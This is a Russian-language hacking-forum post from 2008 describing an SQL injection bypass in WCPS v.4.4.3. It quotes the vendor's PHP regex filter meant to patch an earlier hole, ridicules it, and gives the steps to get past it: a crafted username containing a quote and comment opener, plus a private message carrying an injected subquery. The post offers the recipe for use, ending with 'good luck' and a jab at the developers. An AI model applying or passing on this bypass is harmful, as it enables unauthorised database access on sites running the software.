
23.08.2008, 12:07
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме: 2030482
Репутация:
1796
|
|
SQL Injection in WCPS v.4.4.3
Сцуко, чудики, они даже баги латать нормально не умеют =\.
Собственно заплатка предущей уязвимости:
PHP код:
if(!preg_match("/[a-zA-Z0-9а-яА-Я\_\-\{\}\@\[\]]+$/i", $logines)){
print "Kernel panic";
exit;
}
if(!preg_match("/[a-zA-Z0-9а-яА-Я\_\-\{\}\@\[\]]+$/i", $admin_name)){
print "Kernel panic";
exit;
}
не ну не ппц ли? Вообщем этот зло**учий фильтр обходится элементарно.
Создаем юзера с ником " bla'/*bla" (без ковычег "), пишем PM сообщение " */,1,([SQL запрос]),1,0)/*" (также без ковычег ") то есть все тоже самое как написанно выше, за исключением немного измененного Ника у юзера.
Удачи...
Авторам привет 
__________________
Кто я?..
Последний раз редактировалось Ctacok; 11.12.2009 в 22:12..
Причина: Мат в тексте
|
|
|